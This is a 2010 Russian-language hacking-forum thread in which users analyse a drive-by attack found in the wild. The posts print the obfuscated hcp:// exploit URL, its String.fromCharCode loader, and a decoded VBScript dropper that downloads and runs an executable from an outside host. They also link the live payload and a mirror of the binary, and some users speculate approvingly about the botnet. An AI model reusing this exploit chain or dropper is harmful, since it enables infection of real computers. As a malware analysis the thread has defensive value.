На радиКале сплоит??

Discussion in 'Песочница' started by dr.Web, 1 Oct 2010.

  1. dr.Web

    dr.Web Member

    Joined:
    2 Feb 2009
    Messages:
    7
    Likes Received:
    22
    Reputations:
    10
    Вот такая штучка вежливо попросилась ко мне в систему. Самопроизвольно запустился Windows media player.

    http://sexshop123.ru:81/el/z3l54j/oor5qphv.php?act=iframe&fh=

    во фрейме видим код
    PHP:
    hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28eval%28%27String.fromCharCode(118,97,114,32,111,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,111,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,116,121,112,101,34,44,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,41,59,111,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,115,114,99,34,44,34,104,116,116,112,58,47,47,115,101,120,115,104,111,112,49,50,51,46,114,117,58,56,49,47,101,108,47,122,51,108,53,52,106,47,111,111,114,53,113,112,104,118,46,112,104,112,63,97,99,116,61,106,115,38,102,104,61,34,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,111,41,59)%27%29%29%3C/script%3E 
    который редактируем и выполняем
    PHP:
    javascript:alert(String.fromCharCode(118,97,114,32,111,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,111,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,116,121,112,101,34,44,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,41,59,111,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,115,114,99,34,44,34,104,116,116,112,58,47,47,115,101,120,115,104,111,112,49,50,51,46,114,117,58,56,49,47,101,108,47,122,51,108,53,52,106,47,111,111,114,53,113,112,104,118,46,112,104,112,63,97,99,116,61,106,115,38,102,104,61,34,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,111,41,59))

    Выяснилось что подключается сторонний скрипт с того же сервера.
    PHP:
    Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,83,101,116,32,65,114,103,79,98,106,32,61,32,87,83,99,114,105,112,116,46,65,114,103,117,109,101,110,116,115,58,107,101,121,32,61,32,65,114,103,79,98,106,46,73,116,101,109,40,48,41,58,101,120,101,32,61,32,34,41,88,118,88,118,88,115,98,118,46,53,55,49,56,50,50,54,88,118,88,118,88,32,43,32,114,101,100,108,111,102,112,109,116,40,101,108,105,102,101,116,101,108,101,100,46,111,115,102,58,101,108,105,102,112,109,116,32,43,32,114,101,100,108,111,102,112,109,116,32,99,101,120,101,46,108,108,101,104,115,58,50,32,44,101,108,105,102,112,109,116,32,43,32,114,101,100,108,111,102,112,109,116,32,101,108,105,102,111,116,101,118,97,115,46,109,97,101,114,116,115,111,100,97,111,58,32,121,100,111,98,101,115,110,111,112,115,101,114,46,112,116,116,104,108,109,120,32,32,101,116,105,114,119,46,109,97,101,114,116,115,111,100,97,111,58,32,110,101,112,111,46,109,97,101,114,116,115,111,100,97,111,58,32,49,32,61,32,101,112,121,116,46,109,97,101,114,116,115,111,100,97,111,58,32,51,32,61,32,101,100,111,109,46,109,97,101,114,116,115,111,100,97,111,58,100,110,101,83,46,112,116,116,104,108,109,120,58,48,32,44,108,114,117,32,44,88,118,88,118,88,84,69,71,88,118,88,118,88,32,110,101,112,79,46,112,116,116,104,108,109,120,58,88,118,88,118,88,101,120,101,46,53,55,49,56,50,50,54,88,118,88,118,88,32,61,32,101,108,105,102,112,109,116,58,88,118,88,118,88,92,88,118,88,118,88,32,43,32,41,88,118,88,118,88,80,77,69,84,88,118,88,118,88,40,109,101,116,105,46,41,88,118,88,118,88,83,83,69,67,79,82,80,88,118,88,118,88,40,116,110,101,109,110,111,114,105,118,110,101,46,108,108,101,104,115,32,61,32,114,101,100,108,111,102,112,109,116,58,88,118,88,118,88,61,104,102,38,80,67,72,61,108,112,115,63,112,104,112,46,55,54,57,117,105,98,117,120,47,106,52,53,108,51,122,47,108,101,47,49,56,58,117,114,46,51,50,49,112,111,104,115,120,101,115,47,47,58,112,116,116,104,88,118,88,118,88,32,61,32,108,114,117,58,41,88,118,88,118,88,116,99,101,106,98,111,109,101,116,115,121,115,101,108,105,70,46,103,110,105,116,112,105,114,99,83,88,118,88,118,88,40,116,99,101,106,98,111,101,116,97,101,114,99,32,61,32,111,115,102,32,116,101,115,58,41,88,118,88,118,88,108,108,101,104,83,46,116,112,105,114,99,83,87,88,118,88,118,88,40,116,99,101,106,98,111,101,116,97,101,114,99,32,61,32,108,108,101,104,115,32,116,101,115,58,41,88,118,88,118,88,109,97,101,114,116,115,46,98,100,111,100,97,88,118,88,118,88,40,116,99,101,106,98,111,101,116,97,101,114,99,32,61,32,109,97,101,114,116,115,111,100,97,111,32,116,101,115,58,41,88,118,88,118,88,80,84,84,72,76,77,88,46,50,76,77,88,83,77,88,118,88,118,88,40,116,99,101,106,98,111,101,116,97,101,114,99,32,61,32,112,116,116,104,108,109,120,32,116,101,115,34,58,101,120,101,32,61,32,82,101,112,108,97,99,101,40,101,120,101,44,107,101,121,44,67,104,114,40,51,52,41,41,58,101,120,101,32,61,32,83,116,114,82,101,118,101,114,115,101,40,101,120,101,41,58,101,120,101,99,117,116,101,40,101,120,101,41,32,62,37,84,69,77,80,37,92,54,50,50,56,49,55,53,46,118,98,115,32,38,99,115,99,114,105,112,116,32,37,84,69,77,80,37,92,54,50,50,56,49,55,53,46,118,98,115,32,47,47,98,32,47,47,115,32,88,118,88,118,88));

    Подредактировав его выводим его в алерт
    PHP:
    cmd /echo Set ArgObj WScript.Arguments:key ArgObj.Item(0):exe ")XvXvXsbv.5718226XvXvX + redlofpmt(elifeteled.osf:elifpmt + redlofpmt cexe.llehs:2 ,elifpmt + redlofpmt elifotevas.maertsodao: ydobesnopser.ptthlmx  etirw.maertsodao: nepo.maertsodao: 1 = epyt.maertsodao: 3 = edom.maertsodao:dneS.ptthlmx:0 ,lru ,XvXvXTEGXvXvX nepO.ptthlmx:XvXvXexe.5718226XvXvX = elifpmt:XvXvX\XvXvX + )XvXvXPMETXvXvX(meti.)XvXvXSSECORPXvXvX(tnemnorivne.llehs = redlofpmt:XvXvX=hf&PCH=lps?php.769uibux/j45l3z/le/18:ur.321pohsxes//:ptthXvXvX = lru:)XvXvXtcejbometsyseliF.gnitpircSXvXvX(tcejboetaerc = osf tes:)XvXvXllehS.tpircSWXvXvX(tcejboetaerc = llehs tes:)XvXvXmaerts.bdodaXvXvX(tcejboetaerc = maertsodao tes:)XvXvXPTTHLMX.2LMXSMXvXvX(tcejboetaerc = ptthlmx tes":exe Replace(exe,key,Chr(34)):exe StrReverse(exe):execute(exe) >%TEMP%\6228175.vbs &cscript %TEMP%\6228175.vbs //b //s XvXvX
    По коду заметил что часть его перевёрнута задом на перёд. А теперь вопрос, это сплоит?)
    И что делает этот код?
     
    #1 dr.Web, 1 Oct 2010
    Last edited: 1 Oct 2010
    3 people like this.
  2. Империал

    Joined:
    11 Mar 2010
    Messages:
    1,224
    Likes Received:
    58
    Reputations:
    1
    Маловероятно, что на таком популярном хранилище рисунков сплоит... Хотя в принципе все может быть, и не исключено что их подломили
    Антивирусы как нибудь среагировали?
     
  3. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Какая разница какой ресурс, баги везде одинаковые.
     
  4. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,051
    Likes Received:
    615
    Reputations:
    690
    Безобидный плойнтеГ )
     
    _________________________
  5. PabloPicasso

    PabloPicasso Banned

    Joined:
    2 Jan 2010
    Messages:
    88
    Likes Received:
    32
    Reputations:
    16
    сейчас на всём зарабатывают, никакой совести (((
     
  6. dr.Web

    dr.Web Member

    Joined:
    2 Feb 2009
    Messages:
    7
    Likes Received:
    22
    Reputations:
    10
    Антивирусы? я сам себе антивирус. Нихрена себе думаю виндоус медиа ни с того ни с сего запустился я был в шоке. первый раз на такое наткнулся.
     
  7. Rebz

    Rebz Super Moderator
    Staff Member

    Joined:
    8 Nov 2004
    Messages:
    4,054
    Likes Received:
    1,527
    Reputations:
    1,126
    php.769uibux/j45l3z/le/18:ur.321pohsxes//:ptth
    Забавно закодировали адрес)
     
    1 person likes this.
  8. TrambleR

    TrambleR Banned

    Joined:
    26 Jun 2010
    Messages:
    403
    Likes Received:
    32
    Reputations:
    1
    фиг знает, вроде ниче нет такого, самое худьшее если эта бяка пассы от чеголибо тянет =((
     
  9. dr.Web

    dr.Web Member

    Joined:
    2 Feb 2009
    Messages:
    7
    Likes Received:
    22
    Reputations:
    10
    Вот откуда программка-вирус грузится

    http://sexshop123.ru:81/el/z3l54j/xubiu967.php?spl=HCP&fh=

    Залил софтинку на сендспейс на случай если автор удалит)
    http://www.sendspace.com/file/empnbf

    Отчёт с вирустотала

    http://www.virustotal.com/file-scan/report.html?id=710023b2d963f0827d68fbec14002431152ebb89306d68603feb6fadb62e1fc4-1285940311
     
    #9 dr.Web, 1 Oct 2010
    Last edited: 1 Oct 2010
  10. koyan

    koyan Member

    Joined:
    10 Jun 2010
    Messages:
    59
    Likes Received:
    14
    Reputations:
    5
    и что этот вирус делает?
    если что-то тыряет, или заливает например бот, то ботнетик получиться очеееень не плохой ;)
     
  11. TrambleR

    TrambleR Banned

    Joined:
    26 Jun 2010
    Messages:
    403
    Likes Received:
    32
    Reputations:
    1
    похоже на быдлокриптованый зевс.
     
  12. TrambleR

    TrambleR Banned

    Joined:
    26 Jun 2010
    Messages:
    403
    Likes Received:
    32
    Reputations:
    1
    а нет не зевс, ддос бот, ботнет тут находится atomicc.com при участии http://freedns.ws/ru/
     
    #12 TrambleR, 2 Oct 2010
    Last edited: 2 Oct 2010
    1 person likes this.
  13. koyan

    koyan Member

    Joined:
    10 Jun 2010
    Messages:
    59
    Likes Received:
    14
    Reputations:
    5
    походу я в экстрасенсы записался о_О
    З.Ы. сайт не пашет...но домен зареган
     
  14. TrambleR

    TrambleR Banned

    Joined:
    26 Jun 2010
    Messages:
    403
    Likes Received:
    32
    Reputations:
    1
    я изучил трой в доль и поперег. в реестре а именно в автозагрузке он называет себя как Microsoft office eXtensions в папке с виндой он называется officxe.exe ето он, ламерство голимое а не трой =\

    почему сайт с ботнетом неработает ? похоже на ограничение по IP

    з.ы. написан на делфи 7 ( вроде )
     
    #14 TrambleR, 3 Oct 2010
    Last edited: 3 Oct 2010
    2 people like this.
  15. koyan

    koyan Member

    Joined:
    10 Jun 2010
    Messages:
    59
    Likes Received:
    14
    Reputations:
    5
    походу кто-то сделал отличный ботнетик
    и домен регал как-нибудь...
     
Loading...